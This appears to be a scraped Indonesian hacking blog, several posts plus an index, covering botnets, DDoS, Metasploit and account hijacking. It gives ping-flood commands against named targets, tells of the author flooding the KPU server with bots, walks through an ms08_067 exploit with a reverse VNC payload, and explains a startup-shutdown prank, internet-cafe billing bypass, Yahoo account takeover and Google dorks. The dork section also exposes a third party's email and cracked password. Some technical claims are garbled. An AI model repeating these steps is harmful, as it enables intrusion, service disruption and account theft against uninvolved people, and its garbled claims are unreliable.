Viagra pada forum diskusi, atau anda pernah mendengar bahwa sebuah website tidak dapat diakses
karena mendapat serangan DDOS. Hal-hal tersebut diatas bisa dilakukan dengan melakukan perintah
atas botnets.
Botnet atau Robot jejaringan adalah program tidak terlihat yang tergabung dalam sejumlah pasukan
zombie digital dan dikendalikan oleh hacker melalui internet. Umumnya botnet diorganisir melalui irc
pada chatroom tertentu yang telah di-set oleh pemiliknya (baca: botmaster).
Salah satu jenis botnet yang tersebar di internet adalah worm Conficker/ w32.kido/downadup. Menurut
F-Secure, Conficker menginfeksi lebih dari 9 juta komputer dan merupakan worm yang paling sukses
penyebarannya dalam sejarah worm di internet.
Bagaimana Botnet bekerja?
Irc Botnet melakukan tugasnya berdasarkan perintah botmaster. Botnet bisa mendapatkan akses penuh
terhadap sebuah komputer yang terinfeksi seperti Melakukan serangan DDOS secara serentak,
mengendalikan sistem hardware maupun software, mencuri informasi sensitif korban dan
mengirimkannya ke chatroom.

Serangan Distributed Denial Of Service dengan Botnet
Sebagai ilustrasinya, penulis akan menjelaskan dengan sangat sederhana.
Bayangkan jika anda adalah salah seorang teller pada sebuah bank. Anda akan melayani kostumer
secara satu persatu dimana mereka melakukan antrian dan menunggu giliran. Anda tentu bisa
memenuhi permintaan kostumer secara satu persatu dan terpenuhi. Secara wajarnya, kostumer hanya
melakukan satu atau dua permintaan saja seperti “saya ingin menyetor sejumlah uang” atau “saya
minta bilyet giro ini dicairkan ke rekening saya”. Dan anda bukan satu-satunya teller yang melayani
kostumer. Beberapa teller menjalankan tugas yang sama seperti anda secara teratur.
Tetapi situasi akan berbeda jika ada sekelompok orang dalam jumlah yang banyak secara serentak
menyerbu ke counter dan melakukan banyak permintaan dan berbicara dengan bahasa yang tidak
anda mengerti. Masih bisakah anda memenuhi permintaan mereka? Saya yakin hanya satpam yang
bisa mengatasi penyerbuan dari sekelompok kostumer yang gila dan tidak tahu darimana asalnya.
Di firefox :
GET / HTTP/1.1
Host: 114.121.6.87
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609
Firefox/3.0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Di Internet Explorer :
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwaveflash,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: id
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 114.121.6.87
Connection: Keep-Alive
Di Opera :
GET / HTTP/1.1
User-Agent: Opera/9.50 (Windows NT 5.1; U; en)
Host: 114.121.6.87
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg,
image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: id-ID,id;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive
Permintaan akan direspon oleh server dan sementara browser hanya menunggu kiriman data. Dan
hasilnya adalah tampilan situs yang bisa anda lihat di browser. Untuk permintaan wajar seperti itu, server
tidak akan mengalami masalah.
Tetapi jika server diminta secara berkali-kali dengan berbagai jenis permintaan yang tidak wajar seperti
mengirimkan data sampah dan dilakukan secara serentak. Tentu saja server dengan bandwidth yang
seadanya akan langsung down dalam waktu yang singkat.
Pada sebuah channel IRC, penulis memerintahkan botnet untuk melakukan serangan secara serentak.
Setiap satu botnet penulis mengirimkan paket dan permintaan sebanyak 2 kali setiap detiknya ke server
KPU, ada sekitar 40 bot dengan IP address dan kecepatan koneksi yang berbeda. Artinya ada sekitar 80
kali permintaan setiap detik dimana server KPU memproses permintaan, merespon dan menolak
permintaan yang tidak wajar sebanyak 14400 kali dalam waktu 2 menit.

kaskus pernah hancur karena ddos

|0 komentar

Nah, kalian yang pernah atau sudah bergabung bersama KasKus sejak 2008, pastinya masih inget dong kalau kasKus pernah diserang ama yang satu ini, sehingga KasKus gak bisa diakses ( plus corupt ) yang dilakukan oleh oknum yogyaFree ( katanya ).

Untuk lebih jelasnya, bisa anda baca dibawah ini :

Penyerangan mengakibatkan thread-thread yang telah dibuat terpaksa dikunci (lock).

Pada tanggal 16—17 Mei 2008, Kaskus diserang menggunakan teknik DDoS (Distributed Denial of Service) oleh oknum yang diduga berasal dari komunitas YogyaFree. Serangan ini menyebabkan database Kaskus corrupt sehingga administrator terpaksa mengunci thread-thread yang ada.

Penyerangan tersebut diduga terkait dengan peristiwa perusakan (deface) situs YogyaFree beberapa hari sebelumnya. Penyerang yang mengklaim dirinya sebagai salah satu anggota Kaskus juga melontarkan celaan yang bernada mengejek di salah satu bagian forum YogyaFree. Hal tersebut membuat beberapa anggota YogyaFree berang, dan kemudian balik menyerang Kaskus dengan DDoS. Akibatnya, administrator Kaskus terpaksa mematikan server Kaskus.

Perang cyber antara kedua komunitas ini akhirnya selesai ketika kedua pengelola situs menandatangani memorandum online untuk menyudahkan pertikaian di antara keduanya. Pesan tersebut dipampang selama beberapa minggu di halaman situs masing-masing.

Meskipun kerusakan yang ditimbulkan oleh serangan ini cukup berat, administrator Kaskus menjanjikan bahwa Kaskus akan kembali normal pada bulan Juli 2008, seiring dengan diluncurkannya server baru Kaskus di gedung Cyber, Jakarta. Namun, ia juga mengatakan bahwa data-data yang akan dimunculkan kembali adalah data yang dimuat sebelum tahun 2008, sementara data yang dibuat selama tahun 2008 tidak dapat dimunculkan kembali.

Ditulis oleh template (Co-Admin KasKus dengan User ID 5)

nah, percaya atau nggak, hal ini bisa kita jalankan ( DDoS ) atau lakukan hanya dengan bermodalkan DOS ( sekarang disebut Comand Prompt atau CMD ) dan tanpa software-software yang harganya muaaahaaaaaal banget.

berikut ini Dino berikan cara-caranya ( Singkat mode : On )

Penjelasan da DDoS

Aksi Denial of Service adalah salah satu cara menghentikan atau mematikan sebuah service pada komputer atau server. Sebenarnya, teknik ini adalah teknik yang suaaaangat kuno sekali yang banyak dilakukan pada zaman purbakala. Namun, pada zaman sekarang, banyak sistem yang telah di Upgrade, maka, cara ini akan sangat susah sekali untuk dijalankan. saran saya, sebaliknya anda mencoba pada komputer atau website dalam sebuah jaringan dan diketahui spesifikasinya RENDAH (-an).

penambahan opsi l merupakan salah satu senjata Hacking yang digunakan dalam aktivitas hacking. Dengan huruf l (-l (el) ), maka, ukuran default buffer yang anda kirimkan adalah sebesar 32 bytes bisa diubah. dalam aksi hacking, apabila seseorang menggunakan nilai buffer yang sangat bueeesar sekali ( Seperti User YogyaFree ) tentu hal ini akan sangan berbahaya sekali, tentu hal ini akan sangat berbahaya pada komputer yang spesifikasinya rendah ( Seperti komputer pentium 2 ) terutama dalam sebuah jaringan. Efeknya akan langsung terlihat dan bekerja, yang berupa komputer atau website target bisa menjadi Hang.

Penulisannya adalah dengan mengetikan data ini didalam CMD atau DOS :

Ping -l ip-address/domain-target

sebagai contoh untuk domain target :

Ping -l www.google.co.id 100000

Contoh untuk domain IP address target :

Ping -l 216.239.61.104 100000

Proses ini akan mengirimkan data sebesar 100000 paket data ke target. Dimana hal ini lebih tinggi dibandingkan kapasitas TCP/IP Google yang hanya sebesar 90000 ( Contoh aja Gan ).

Perintah kedua yang digunakan dalam aksi DDoS ini adalah opsi -t. Penulisannya adalah : Ping -t ip-address/domain-target. ( Cara penggunaannya sama seperti -l )

Hal ini akan mengirimkan 32 bytes data ke target secara bertubi-tubi. Hal inilah yang menyebabkan komputer dengan spesifikasi Rendah akan menjadi hang atau Down. Pemberhentian ini hanya bisa dilakukan dengan menekan tombol Ctrl+C pada keyBoard anda.


Akan lebih parah lagi jika kedua opsi tersebut digabungkan menjadi satu :

Ping -t -l ip-address/domain-target


Cara Membuat Komputer Langsung Shutdown Saat Di Hidupkan

|0 komentar
Cara Membuat Komputer Langsung Shutdown Saat Di Hidupkan

Buat Shortcut "Klik Kanan" Pada Dekstop Pilih "New" â–º "Shortcut"
Pada "Type the location of the item:" Ketikkan Shutdown -s -t "0"
Klik "Next >" Masukkan Nama Shortcutnya "Auto Off"
Buka Menu "Start" â–º "Klik Kanan" Pada "All Program" â–º "Open" Copy Shortcut Yang Anda Buat Tadi Ke Directory "Start Menu"
Kemudian Buka "Regedit"
Buka Menu "Start" â–º "Run" â–º Ketikkan "regedit" â–º "enter" Atau "Winkey + R"
Buka "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Klik Kanan Pada Window "Run" Pilih "String Value" Masukkan Nama Stringnya "Auto Off"
Double Klik Pada String "Auto Off" Pada "Value Data" Masukkan Address Shortcutnya !!! Contoh C:\Documents and Settings\Erik Cookies\Start Menu\Auto Off
Setelah Kata "Start Menu" Itu Adalah Nama Shortcut Yang Anda Buat Tadi Yaitu "Auto Off"
Klik "OK"
Kemudian Tutup Jendela "Registry Editor"
Dan "Restart" Komputer !!!

Klo Komputer Menggunakan Deepfreeze "Disable" kan Deepfreeze Terlebih Dahulu....
Klo Main Di Warnet Bobol Deepfreeze Dan Undeepfreeze Bisa Di Cari Di Google
Usahakan Bobol Deepfreeze Dahulu Baru Bikin Tutor Diatas
Klo Gak Di Bobol Dahulu Gak Bakalan Bisa....
Sekian Tutor Dari Saia....
Jangan Di Gunakan Untuk Kejahatan....

Oh iia !!!
Cara Balikinnya Adalah Waktu Komputer Hidupkan Pencet F5
Dan Pilih Safe Mode â–º Enter !!!
Setelah Proses Selesai
Biasanya Di Perintahkan Pilih User !!!
Pilih Aja User Yang Bukan Administrator !!!
Dan Setelah Masuk Ke Dekstop, Buka Ke Regedit Dan Masuk HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Klik Kanan Pada String Value Yang Anda Buat Tadi Dan Delete !!!
Restart Komputer !!!
Dan Auto Shutdown Pun Sudah Tidak Aktif !!!



bobol biling warnet( masuk sebagai admin)

|0 komentar
bobol biling warnet( masuk sebagai admin)


Kali ini sy akan sedikit bahas mengenai gimana si caranya biar kita Free Internet di Warnet ??:

( nah ini pasti buat pencinta Game sangat antusias ni )

ikuti langkah sy ini, asal mau nurut & gk aneh2 dengan step yang sy berikan !!

1. Oke langkah awal ini kita harus cari itu yang namanya kabel LAN pada komputer yang akan kita tempati, nah kalo uda ketemu poko ciri2 kabel putih & colokannya agak mejeng/ keren dikit nah itu pasti kabel LAN !! hehehe

2. Oke tahap dua, kalo uda ketemu tuh kabel apa ya yang harus dilakuin ??
Gampang aja & simple, kaka cabut aja tuh kabel LAN dari CPU, hehehe
Terkesan mencurigakan, tapi ini murni bisa di terapkan pada Warnet yang mempunyai daya tampung ruang atau bisa kita sebut aja punya komputer banyak.

3. Oke tahap 3 ini lebih agak dipercepat aja , soalnya ntar kalo kelamaan utak-atik kabel pihak warnet taug, and yang gk kalah hebohnya kita bisa dihakimi massa ( nah kalo ini terjadi, bukan tanggung jawab sy !! ) hehehe
Tahap 3 ini setelah kaka berhasil cabut tuh kabel, langsung restart kembali tu komputer, kalo udahh ..

4. Nah tahap ini langsung aja gk usah banyak cekidot bekicot !!! hehee
Kalo udah kalian restart ntar kan tuh billing mulai dari " Personal, Paket, Admin dkk " kan mucul tuh ??
Ntar kalian klik aja sebagai admin ( umpamanya ini adalah pemilik warnet itu ) huahahahaha
Eh masuk tahap 5 aja ya yang mau masuk jadi admin ?? wkkwkwkw

5. Kalo uda kan tadi klik admin ??
Nah langsung aja isi password admin itu dengan " 008 " ( soalnya ni merupakan passworde default dari app billing yang biasa di pake di warnet )
Nah kalo udah, kalian hapus aja tuh password admin yang ada di kolom paling bawah kiri ( catatan buat masuk tahap ini, cari aja yang dalam kolom isinya bintang " * " )

6. Yang ke-6 ini, adalah ...
Eng ing enggggg ..
Berhasil deh kalian masuk sebagai admin,

metasploit tutorial

|0 komentar

mungkin tutor ini banyak di temukan di google karena saking banyaknya
yang kuasai tools ini, mulai dari para sesepuh hacking maupun para anak baru
di dunia underground kayak gw

persiapan yg di perlukan antara lain:

1.Metasploit versi berapa z, karena sekarang udah versi 3.3 maka kita akan
memakai versi baru tersebut tool ini bisa di download di http://metasploit.com

2.Komputer dengan internet karena ini harus ada usahakan dalam satu jaringan
karena kita akan meremote komputer lain, untuk OSnya terserah kita
bisa pake linux, windows, unix ( pke backtrack lebih keren )

3.Nmap tapi buat metasploit framework udah terinclude langsung Nmapnya

4.Ip dari komputer korban ( 192.168.2.78)

5.mau nyiapin apa z terserah dehh

pertama install metasploitnya, klo di mikocok tinggal next, next dst tapi klo
di linux kita tinggal download source filenya terus terus kita install ( ini buat
metasplot framework v3.2) klo buat v3.3 kita bisa langsung runn filenya

./framework-3.3-linux-i686.run /opt (kasih perm buat di execute dulu)

klo udah selesai semua, tinggal kita mulai mengexploit PC Korban( kali ini cuma
cuma simulasi ).

pertama kita scan range ip yg ada dalam satu jaringan komputer, terserah make tool apa
aja deh yang penting bisa tau ip pc teman, klo gw sih sering maku
angry IP Scanner, di sini kita tidak membtuhkan ip public dari korban kita.
Klo udah selesai kita bisa launch metasploitnya

( simulation on Mikocok )
klik metasploit console yg ada di start menu
setelah itu akan muncul jendela metasploit

____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 452 exploits - 218 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7628 updated 6 d

msf >

kayak gini tampilan metasploitnya.
scan komputer korban dengan Nmap

nmap -v -O -p445 192.168.2.87

command di atas untuk mendeteksi OS korban serta port 445 terbuka apa g.
klo udah selesai kita ke jendela metasploitnya

ketikan di jendela msf(metasploit)

show exploits
fungsinya untuk melihat exploit apa saja yang bisa di gunakan

karena pada simulasi ini saya menggunakan exploit
windows/smb/ms08_067_netapi
exploit ini terjadi pada OS XP SP2 ke bawah

dari msf ketik
use windows/smb/ms08_067_netapi
setelah itu maka kita akan masuk ke exploit ini
akan muncul
msf exploit(ms08_067_netapi) >
dari situ ketik lagi
show PAYLOAD

TCP Stager
windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports Windows Command Shell, Reverse All-Port TCP Stager
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports Windows Upload/Execute, Reverse All-Port TCP Stager
windows/vncinject/bind_ipv6_tcp VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_ipv6_tcp VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports VNC Server (Reflective Injection), Reverse All-Port TCP Stager


ini merupakan mode apa yang akan kita gunakan untuk masuk ke komputer
korban, di sini kita akan menggunakan payload

windows/vncinject/reverse_tcp

setelah dari situ kita set pada msf untuk menggunakan payload tsb dgn perintah
set PAYLOAD windows/vncinject/reverse_tcp

setelah itu kita set ip dari target

set RHOST 192.168.2.87 -----> komputer korba

set LHOST 192.168.2.2 -----> komputer kita

klo udah selesai kita tinggal launch exploit di msf

tinggal ketik

exploit

tunggu setelah selesai, akan muncul jendela desktop dari komputer korban.
kita tinggal remote komputer

Klo untuk pemahaman buat msf sih tergantung kreatifnya kita gmn caranya
karena dalam msf banyak sekali bug yg bisa kita exploit

kelebihan OS linux

|0 komentar
kelebihan OS linux


1. Tidak memerlukan perangkat keras yang mahal. Linux dapat berjalan pada komputer PC dengan konfigurasi minimal sbb :
* Mikroprosesor 386 DX (intel, AMD, Cyrix, TI, Chips&Tech.)
* RAM 4 MB (tanpa GUI) dan 8 MB (dengan GUI)
* Space harddisk 85 MB

2. Linux merupakan sistem operasi FULL 32-bit. Tak ada kode 16-bit atau campuran keduanya dalam setiap aplikasinya, sehingga kecil kemungkinan terjadi crash (bentrok) antar aplikasi.

3. Preemptive multitasking, yaitu menangani banyak proses secara bersamaan, semua proses tersebut tidak saling menghalangi/ menghambat walaupun berjalan pada saat yang sama.

4. Multiuser, yaitu lebih dari satu orang dapat menggunakan program yang sama/ berbeda-beda dari satu mesin yang sama pada saat bersamaan di terminal yang sama/berbeda.

5. Multiconsole. Dalam satu komputer, pengguna dapat melakukan login dengan nama user yang sama/berbeda lebih dari satu kali, tanpa perlu menutup sesi sebelumnya.

6. Linux memiliki grafis antarmuka (GUI) sebagaimana Operating System modern lainnya. Antarmuka grafisnya dinamakan X-Window System (bukan X-Windows) dengan pilihan tampilan yang bervariasi (dinamis).

7. Program - program maupun aplikasi-aplikasi networking tersedia dalam semua distribusi Linux (dalam CD atau disket), sehingga tak perlu mencari/membeli/mendownload aplikasi tambahan lagi.

8. Tidak perlu melakukan defragment. Linux memakai sistem file ext2fs (Second Extended File System) yang mempunyai keunggulan reduksi fragmentasi otomatis. Dengan memakai ext2fs, kinerja baca/tulis (akses) dari/ke harddisk tetap terjaga.

9. Dukungan akses 33 macam sistem file yang berbeda. Linux mampu mengakses sistem file FAT16, FAT32 (kepunyaan DOS), VFAT (Win), HPFS (OS/2), Minix, UFS (Solaris), Xenix, SCO, Novell, dsb.

10. Pertambahan Pengguna Linux yang pesat. Linux adalah varian UNIX(TM) yang tercatat mempunyai perkembangan paling pesat di seluruh dunia. Dengan semakin bertambahnya pengguna, semakin mudah mendapatkan dukungan dan driver untuk perangkat keras yang beragam. Situs-situs web yang didedikasikan untuk menyebarkan informasi mengenai Linux serta ajang diskusi tentang Linux juga semakin bertambah jumlahnya.

11. Remote Control. Setiap pengguna Linux yang memanfaatkan port 23 dengan program Telnet dapat mengendalikan komputer Linux dari jarak jauh, kapan pun, dari mana pun, seperti seolah - olah sang pengguna berada di hadapannya secara langsung.

cara hack email facebook (newbie inside)

|0 komentar
Cara Hack Facebook ini tidak direkomendasikan bagi teman-teman yang berniat mencuri chip poker, namun disini saya rekomendasikan bagi hal-hal yang bermanfaat seperti: ingin mengetahui mobilitas pesan orang terdekat anda (Istri/Suami, Tunangan, Anak, Saudara dan lain-lain), memperbaiki akun email yang terblokir dan mengetahui password Facebook kita yang terlupakan.

Mungkin itu tujuan awal saya berbagi tips ini, untuk selanjutnya itu tanggung jawab anda.
Oke, langsung saja ke langkah-langkah untuk hack akun facebook. Sebelum ke langkah-langkah hack facebook, perlu kiranya anda memenuhi syarat-syarat berikut:

* Harus memiliki alamat email target dari Yahoo.Com (yahoo.com, ymail.com, rocketmail.com, yahoo.co.id...dll)

* Anda harus tahu mengenai target, khususnya tanggal lahir, tempat spesial, guru pertama dan lain-lain.

Jika dua syarat itu terpenuhi, maka kemungkinan besar anda bisa hacking facebook target yang pada awalnya harus hack emailnya dulu. Mari kita lanjutkan untuk langkah-langkah hack facebook via email ini, pertama-tama saya paparkan tutorial hack facebook via email yahoo (jika target menggunakan email yahoo).

Langkah pertama, Lakukan Seperti gambar di bawah ini....



Langkah Kedua, Seperti Gambar di bawah ini.........


Langkah ketiga, Seperti Gambar di bawah ini........


Langkah Keempat, Seperti Gambar di bawah....

(Jika anda benar-benar dekat dengan target, maka anda kemungkinan besar bisa menjawab pertanyaan di kolom tersebut)
Langkah Terakhir, jika anda bisa menjawab pertanyaan pada langkah keempat. Maka, anda akan masuk pada halaman reset password. Halaman reset password adalah password baru yang bebas anda buat atau secara tidak langsung anda telah menguasai email tersebut.,,,,

---===Selamat Mencoba===---

jika ada pertanyaan silahkan diskusikan disini

nonton starwars di cmd milik kalian

|0 komentar
nonton starwars di cmd milik kalian


langsung aja tanpa basa basi

Buka Run
tulis Cmd
setelah keluar layar hitam ( dos )
Tulis Telnet
setelah keluar layar hitam Telnet
lalu tulis huruf " o " ( tu huruf o bukan 0 ) tanpa tanda kutib
lalu tulis towel.blinkenlights.nl

baru setelah itu telnet akan melakukan koneksi ke server

dan tada selamat menyaksikan film stars wars di cmd mu

hack akun email menggunakan google dork

|0 komentar
Hari ini saya akan menunjukkan kepada Anda cara hack account email menggunakan beberapa Dorks google khusus, ingat google adalah teman kita

Persyaratan:

Google Dorks:

ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password
ext:sql intext:@hotmail.com intext:password


Online hash cracker:
http://md5crack.com/

Ok mari kita mulai:

Mari kita pergi ke http://www.google.com dan copy paste kan dork yang saya share,.....dan cari salah satu situs di sana buat korban


Pilih salah satu halaman ditampilkan, seperti yang Anda lihat sekarang kita memiliki banyak account email + hash

Saya memilih account acak
zhaokailun92@yahoo.com.cn
d2491b289b6be1fd0bb0c8d60 e053d3d



Seperti yang Anda lihat kita dapat menghack account yang kita tuju
Email: zhaokailun92 @ yahoo. com.cn
Password: 19920707

ets, bersenang-senang dan menikmati akun tak terbatas

jika masih ada pertanyaan silahkan tanyakan disini


memasukan jebakan betmen ke situs deface kita

|0 komentar
langsung aja
pertama buka notepad save dgn .html

<html>
  <head>
    <title>Hacked By BM.hacker</title>
  </head>
  <frameset rows="*" framespacing="0" border="0" frameborder="NO">
<frame src="http://bilogisma.blogspot.com/" name="Hacked By BM.hacker" scrolling="auto" noresize>
  </frameset>
  <noframes>
    <body>
    </body>
  </noframes>
</html> 


upload file .html yang kita buat tadi di situs deface kita
misal na mau buat jebakan betmen sendiri, ganti link http://bilogisma.blogspot.com/ dengan link jebakan betmen kalian.



.

  1. Kumpulan Software Usil
  2. Mengatasi Proteksi Klik Kanan Pada Website
  3. virus facebook chat
  4. script perusak
  5. spaw deface
  6. membuat komputer tidur
  7. hard reset symbian phone
  8. merubah nama procesor
  9. merubah ukuran foto tanpa mengurangi kualitas
  10. membuat flash animasi dengan giotto
  11. smadav pro keygen
  12. orang yang pertamakali menciptakan virus
  13. membuat video menjadi screen saver
  14. Shutdown Komputer Dengan Klik Kanan
  15. fatality script
  16. virus gelap
  17. cara membuat error keyboard
  18. cara merusak file tercepat
  19. daftar antivirus gadungan
  20. membuat komputer jadi error dengan java script
  21. 7 cara mengusir virus
  22. membuat virus mematikan
  23. mengenal virus dan cara kerjanya
  24. berbagai cara mengatasi virus
  25. melakukan flooding di jaringan
  26. video tutorial hacking
  27. edit dan membuat video dengan videopad editor
  28. mengamankan komputer dari malware dan phising
  29. facebook akan segera hancur
  30. SQL injection tutorial
  31. mencari driver yang hilang
  32. kumpulan perintah CMD
  33. pengertian deface
  34. panduan untuk hacking
  35. hacking facebook e-mail
  36. sedikit rahasia pada window
  37. Chat Dengan Command Prompt
  38. talking about hacking ATM
  39. hacking e-mail dengan google dork
  40. cara mengendalikan komputer orang lain
  41. Injection site (work on win xp only)
  42. Menjalankan exe dengan aman
  43. script buat jailin kompi temen
  44. merubah gambar menjadi text
  45. boomber like facebook
  46. Total Network Monitor - Pemantau Multi Jaringan
  47. NirLauncher - Tool serba guna
  48. Httrack-3.44.1 - Tool penganalisa website
  49. deface situs web
  50. kumpulan situs decript md5
  51. Merusak File MP3 dengan Notepad
  52. Membuat serangan DDOS dari notepad
  53. hacking hotspot pasword
  54. Mengubah tampilan google dengan nama kita
  55. cara hack facebook teman
  56. mengenal botnet
  57. kaskus pernah hancur karena ddos
  58. Cara Membuat Komputer Langsung Shutdown Saat Di Hi...
  59. bobol biling warnet( masuk sebagai admin)
  60. metasploit tutorial
  61. kelebihan OS linux
  62. cara hack email facebook (newbie inside)
  63. nonton starwars di cmd milik kalian

brute force

|0 komentar
brute force


Serangan brutal (bahasa Inggris:Brute-force attack) adalah sebuah teknik serangan terhadap sebuah sistem keamanan komputer yang menggunakan percobaan terhadap semua kunci yang mungkin. Pendekatan ini pada awalnya merujuk pada sebuah program komputer yang mengandalkan kekuatan pemrosesan komputer dibandingkan kecerdasan manusia. Sebagai contoh, untuk menyelesaikan sebuah persamaan kuadrat seperti x²+7x-44=0, di mana x adalah sebuah integer, dengan menggunakan teknik serangan brute-force,

penggunanya hanya dituntut untuk membuat program yang mencoba semua nilai integer yang mungkin untuk persamaan tersebut hingga nilai x sebagai jawabannya muncul. Istilah brute force sendiri dipopulerkan oleh Kenneth Thompson, dengan mottonya: "When in doubt, use brute-force" (jika ragu, gunakan brute-force).

Teknik yang paling banyak digunakan untuk memecahkan password, kunci, kode atau kombinasi. Cara kerja metode ini sangat sederhana yaitu mencoba semua kombinasi yang mungkin.
Sebuah password dapat dibongkar dengan menggunakan program yang disebut sebagai password cracker. Program password cracker adalah program yang mencoba membuka sebuah password yang telah terenkripsi dengan menggunakan sebuah algoritma tertentu dengan cara mencoba semua kemungkinan. Teknik ini sangatlah sederhana, tapi efektivitasnya luar biasa, dan tidak ada satu pun sistem yang aman dari serangan ini, meski teknik ini memakan waktu yang sangat lama, khususnya untuk password yang rumit.

Namun ini tidak berarti bahwa password cracker membutuhkan decrypt. Pada prakteknya, mereka kebayakan tidak melakukan itu. Umumnya, kita tidak dapat melakukan decrypt password-password yang sudah terenkripsi dengan algoritma yang kuat. Proses-proses enkripsi modern kebanyakan hanya memberikan satu jalan, di mana tidak ada proses pengembalian enkripsi. Namun, anda menggunakan tool-tool simulasi yang mempekerjakan algoritma yang sama yang digunakan untuk mengenkripsi password orisinal. Tool-tool tersebut membentuk analisa komparatif. Program password cracker tidak lain adalah mesin-mesin ulet. Ia akan mencoba kata demi kata dalam kecepatan tinggi. Mereka menganut "Azaz Keberuntungan", dengan harapan bahwa pada kesempatan tertentu mereka akan menemukan kata atau kalimat yang cocok. Teori ini mungkin tepat mengena pada anda yang terbiasa membuat password asal-asalan. Dan memang pada kenyataannya, password-password yang baik sulit untuk ditembus oleh program password cracker.


pengertian ddos atack

|0 komentar
pengertian ddos atack


Serangan DoS (bahasa Inggris: denial-of-service attacks')
adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:
Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.

Percobaan serangan Denial of Service yang dilakukan terhadap sebuah host dengan sistem operasi Windows Server 2003 Service Pack 2 (Beta).


